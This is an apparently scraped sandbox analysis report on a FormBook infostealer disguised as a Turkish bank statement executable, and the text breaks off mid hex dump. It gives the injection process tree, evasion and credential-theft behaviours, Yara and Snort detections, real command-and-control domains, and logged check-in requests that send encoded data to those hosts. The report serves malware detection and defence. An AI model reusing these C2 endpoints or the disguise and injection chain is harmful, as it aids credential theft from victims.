Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe

Overview

General Information

Sample Name:T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
Analysis ID:806923
MD5:9d0b109dd6efb4a954ff88d024034d3a
SHA1:13b2c7e70fbf0027584783910e61222e7cacae58
SHA256:f3197cca74f60c552d9d3b4d04d99996ceca8c8dc6ad845a468c10c65062a0fc
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Contains functionality to detect sleep reduction / modifications
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe (PID: 3664 cmdline: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe MD5: 9D0B109DD6EFB4A954FF88D024034D3A)
    • tqxwmam.exe (PID: 4332 cmdline: "C:\Users\user\AppData\Local\Temp\tqxwmam.exe" C:\Users\user\AppData\Local\Temp\wjybinpf.dj MD5: B3C569394E804A6C34E9677DACE79A23)
      • tqxwmam.exe (PID: 2460 cmdline: C:\Users\user\AppData\Local\Temp\tqxwmam.exe MD5: B3C569394E804A6C34E9677DACE79A23)
        • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • cmmon32.exe (PID: 2772 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.331233297.00000000005B0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.331233297.00000000005B0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f0d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x18307:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000002.00000002.331233297.00000000005B0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x18105:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17ba1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x18207:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1837f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xaa1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1de77:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ee2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x20e83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xcc02:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x1a0ba:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.tqxwmam.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        2.2.tqxwmam.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20083:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbe02:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x192ba:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        2.2.tqxwmam.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x190b8:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18b54:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x191ba:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x19332:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xb9cd:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17d9f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1ee2a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1fddd:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.tqxwmam.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.tqxwmam.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x20e83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xcc02:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1a0ba:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.58.8.8.861893532023883 02/14/23-08:22:30.544280
          SID:2023883
          Source Port:61893
          Destination Port:53
          Protocol:UDP
          Classtype:Potentially Bad Traffic
          Timestamp:192.168.2.566.160.197.7649714802031453 02/14/23-08:23:51.479305
          SID:2031453
          Source Port:49714
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.566.160.197.7649714802031449 02/14/23-08:23:51.479305
          SID:2031449
          Source Port:49714
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.566.160.197.7649714802031412 02/14/23-08:23:51.479305
          SID:2031412
          Source Port:49714
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeReversingLabs: Detection: 30%
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeVirustotal: Detection: 43%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.tqxwmam.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.tqxwmam.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.331233297.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.331080035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.556915588.0000000000900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.557710413.0000000003280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.557515887.0000000002F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.331329417.00000000005E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.searchvity.com/?dn=URL Reputation: Label: malware
          Source: http://www.ladybillplanet.com/ghii/?uyr=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC+bcuH8jypYjqHnnMah8No3XkProQXaSL0hAuoA==&IlOzNN=EyIBgfI12ZAvira URL Cloud: Label: malware
          Source: http://www.searchvity.com/URL Reputation: Label: malware
          Source: http://www.octohoki.netAvira URL Cloud: Label: malware
          Source: http://www.octohoki.net/ghii/Avira URL Cloud: Label: malware
          Source: http://www.hubyazilim.com/ghii/Avira URL Cloud: Label: malware
          Source: http://www.energybig.xyz/ghii/Avira URL Cloud: Label: malware
          Source: http://www.7dkjhk.com/ghii/Avira URL Cloud: Label: malware
          Source: http://www.energybig.xyzAvira URL Cloud: Label: malware
          Source: http://www.octohoki.net/ghii/?IlOzNN=EyIBgfI12Z&uyr=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIoVIj1yavarUZuxw==Avira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloud/ghii/Avira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloudAvira URL Cloud: Label: phishing
          Source: http://www.wenzid4.top/ghii/?IlOzNN=EyIBgfI12Z&uyr=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3LCH1xNv1NtM5EA==Avira URL Cloud: Label: malware
          Source: http://www.ladybillplanet.com/ghii/Avira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloud/ghii/?uyr=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0gyz2/IGepHjywiw==&IlOzNN=EyIBgfI12ZAvira URL Cloud: Label: malware
          Source: http://www.wenzid4.top/ghii/Avira URL Cloud: Label: malware
          Source: http://ladybillplanet.com/ghii/?uyr=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lCAvira URL Cloud: Label: malware
          Source: http://www.energybig.xyz/ghii/?IlOzNN=EyIBgfI12Z&uyr=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7gh4V4lR0M0OxnEw==Avira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\tqxwmam.exeReversingLabs: Detection: 12%
          Machine Learning detection for sample
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeJoe Sandbox ML: detected
          Source: 1.2.tqxwmam.exe.620000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.tqxwmam.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: C:\xampp\htdocs\f0fce35ed4774783839e8c65445068bf\Loader\Release\Loader.pdb source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe, 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmp, T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe, 00000000.00000002.306790844.0000000002845000.00000004.00000020.00020000.00000000.sdmp, tqxwmam.exe, 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmp, tqxwmam.exe, 00000001.00000000.292893107.000000000040E000.00000002.00000001.01000000.00000004.sdmp, tqxwmam.exe, 00000002.00000000.295754876.000000000040E000.00000002.00000001.01000000.00000004.sdmp, explorer.exe, 00000003.00000002.570167249.00000000151E3000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000004.00000002.557026801.0000000000974000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.558739823.0000000004E43000.00000004.10000000.00040000.00000000.sdmp, tqxwmam.exe.0.dr, nsvBFE8.tmp.0.dr
          Source: Binary string: wntdll.pdbUGP source: tqxwmam.exe, 00000001.00000003.297446466.000000001A130000.00000004.00001000.00020000.00000000.sdmp, tqxwmam.exe, 00000001.00000003.296475865.0000000002200000.00000004.00001000.00020000.00000000.sdmp, tqxwmam.exe, 00000002.00000002.331478562.0000000000B7F000.00000040.00001000.00020000.00000000.sdmp, tqxwmam.exe, 00000002.00000003.302557401.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, tqxwmam.exe, 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.332912365.0000000004964000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.331123365.00000000047C7000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.557966752.0000000004B00000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.557966752.0000000004C1F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: tqxwmam.exe, tqxwmam.exe, 00000002.00000002.331478562.0000000000B7F000.00000040.00001000.00020000.00000000.sdmp, tqxwmam.exe, 00000002.00000003.302557401.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, tqxwmam.exe, 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.332912365.0000000004964000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.331123365.00000000047C7000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.557966752.0000000004B00000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.557966752.0000000004C1F000.00000040.00001000.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.genuineinsights.cloud
          Source: C:\Windows\explorer.exeDomain query: www.octohoki.net
          Source: C:\Windows\explorer.exeNetwork Connect: 107.148.8.96 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 194.102.227.30 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ladybillplanet.com
          Source: C:\Windows\explorer.exeNetwork Connect: 66.160.197.76 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 184.94.215.91 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.146 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.162.149 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.cutgang.net
          Source: C:\Windows\explorer.exeDomain query: www.energybig.xyz
          Source: C:\Windows\explorer.exeDomain query: www.wenzid4.top
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.5:61893 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49714 -> 66.160.197.76:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49714 -> 66.160.197.76:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49714 -> 66.160.197.76:80
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.energybig.xyz
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /ghii/?IlOzNN=EyIBgfI12Z&uyr=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3LCH1xNv1NtM5EA== HTTP/1.1Host: www.wenzid4.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?IlOzNN=EyIBgfI12Z&uyr=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7gh4V4lR0M0OxnEw== HTTP/1.1Host: www.energybig.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?uyr=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0gyz2/IGepHjywiw==&IlOzNN=EyIBgfI12Z HTTP/1.1Host: www.genuineinsights.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?IlOzNN=EyIBgfI12Z&uyr=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIoVIj1yavarUZuxw== HTTP/1.1Host: www.octohoki.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?uyr=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC+bcuH8jypYjqHnnMah8No3XkProQXaSL0hAuoA==&IlOzNN=EyIBgfI12Z HTTP/1.1Host: www.ladybillplanet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 66.235.200.146 66.235.200.146
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.energybig.xyzConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.energybig.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.energybig.xyz/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 72 3d 4b 75 47 55 64 7a 32 39 51 61 76 34 54 6a 52 59 70 51 55 4d 57 62 6d 6d 78 61 4d 6b 79 5f 39 55 4e 6c 47 4b 61 56 4c 4b 45 49 63 36 6f 61 33 38 41 59 4f 7a 63 75 63 4f 67 76 50 7a 63 6a 32 59 63 59 75 70 38 5f 51 4d 71 55 61 38 69 69 71 32 38 63 37 5a 75 59 45 6c 68 79 38 6f 30 4f 39 71 50 67 4b 52 43 6c 57 50 30 65 39 31 6f 2d 6a 4c 48 4f 6c 4d 6d 79 41 46 70 56 46 6b 35 37 6b 5f 63 56 30 79 57 41 48 53 4d 39 63 35 69 59 46 42 54 43 61 63 43 4a 41 71 76 56 47 2d 57 30 44 34 28 69 52 73 42 59 28 32 49 36 46 4f 44 76 36 55 55 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyr=KuGUdz29Qav4TjRYpQUMWbmmxaMky_9UNlGKaVLKEIc6oa38AYOzcucOgvPzcj2YcYup8_QMqUa8iiq28c7ZuYElhy8o0O9qPgKRClWP0e91o-jLHOlMmyAFpVFk57k_cV0yWAHSM9c5iYFBTCacCJAqvVG-W0D4(iRsBY(2I6FODv6UUA).
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.genuineinsights.cloudConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.genuineinsights.cloudUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.genuineinsights.cloud/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 72 3d 57 5f 42 47 48 56 4b 79 39 42 52 73 41 79 6c 48 66 4a 73 2d 79 6e 77 4a 62 75 4d 36 37 39 6f 4a 76 7a 45 4b 48 6f 49 72 61 53 32 72 4b 2d 59 66 63 36 44 6d 69 44 4b 58 38 2d 4d 4d 74 68 33 4c 48 62 54 6f 65 6b 78 58 67 56 34 31 42 65 56 5a 6e 56 73 49 32 6c 37 68 46 33 57 49 61 77 32 32 6d 2d 31 32 6b 59 4d 2d 64 56 51 69 5a 63 33 6e 74 31 47 70 4b 4c 57 7a 56 35 6f 58 66 48 4c 59 64 70 31 61 74 42 7e 65 30 4c 28 6a 59 61 6c 34 5a 5f 4d 6d 30 32 72 73 53 75 4b 76 6b 38 41 6b 63 32 45 65 36 4b 48 78 49 6e 62 4e 66 51 53 58 37 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyr=W_BGHVKy9BRsAylHfJs-ynwJbuM679oJvzEKHoIraS2rK-Yfc6DmiDKX8-MMth3LHbToekxXgV41BeVZnVsI2l7hF3WIaw22m-12kYM-dVQiZc3nt1GpKLWzV5oXfHLYdp1atB~e0L(jYal4Z_Mm02rsSuKvk8Akc2Ee6KHxInbNfQSX7Q).
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.octohoki.netConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.octohoki.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.octohoki.net/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 72 3d 72 5a 6e 54 4d 5a 52 69 46 75 51 4c 79 4e 6d 72 33 42 34 79 59 54 51 58 45 59 56 35 79 37 45 37 47 5a 4a 4e 63 41 77 4c 59 62 6f 54 41 43 56 37 45 59 4e 4f 49 4c 6c 41 74 35 35 63 64 4f 64 59 31 7a 71 51 34 36 59 6f 4c 50 4e 42 4d 67 51 4f 44 30 59 78 55 35 6d 4c 37 49 6d 47 71 45 6b 70 35 46 35 38 47 67 45 76 58 75 64 2d 4b 5a 32 31 30 64 6a 6e 37 50 76 35 45 75 51 63 73 43 52 53 58 67 35 54 45 49 76 35 41 53 66 39 76 46 31 49 55 6a 4d 68 75 6b 53 6b 4d 43 5a 77 71 78 4a 6d 49 48 52 56 73 70 38 51 34 4b 4c 43 5a 52 6c 78 49 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyr=rZnTMZRiFuQLyNmr3B4yYTQXEYV5y7E7GZJNcAwLYboTACV7EYNOILlAt55cdOdY1zqQ46YoLPNBMgQOD0YxU5mL7ImGqEkp5F58GgEvXud-KZ210djn7Pv5EuQcsCRSXg5TEIv5ASf9vF1IUjMhukSkMCZwqxJmIHRVsp8Q4KLCZRlxIQ).
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.ladybillplanet.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.ladybillplanet.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ladybillplanet.com/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 72 3d 71 50 59 4d 58 4e 6c 66 51 6d 31 32 44 32 74 59 49 61 33 61 6c 5a 4a 68 39 35 7a 6e 4a 32 7a 38 77 4a 4b 71 28 43 61 34 78 69 69 47 70 78 59 39 76 4d 74 36 66 43 66 6f 69 73 6b 31 6d 72 38 36 43 2d 48 68 6e 70 47 5f 4c 45 36 34 66 56 30 56 37 58 72 39 4e 35 52 2d 62 39 61 6a 38 42 51 63 33 42 28 4e 73 37 33 7a 6e 4a 6b 4b 42 61 53 45 66 59 50 30 78 38 73 35 28 37 4f 63 59 46 52 73 6f 32 42 65 45 58 66 6a 79 65 31 32 72 34 49 4b 79 71 7e 76 5a 32 6d 63 50 73 56 7a 32 4d 46 34 62 76 67 62 56 76 64 4c 56 75 67 71 45 34 7e 49 4a 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyr=qPYMXNlfQm12D2tYIa3alZJh95znJ2z8wJKq(Ca4xiiGpxY9vMt6fCfoisk1mr86C-HhnpG_LE64fV0V7Xr9N5R-b9aj8BQc3B(Ns73znJkKBaSEfYP0x8s5(7OcYFRso2BeEXfjye12r4IKyq~vZ2mcPsVz2MF4bvgbVvdLVugqE4~IJg).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 14 Feb 2023 07:20:50 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Feb 2023 07:23:32 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 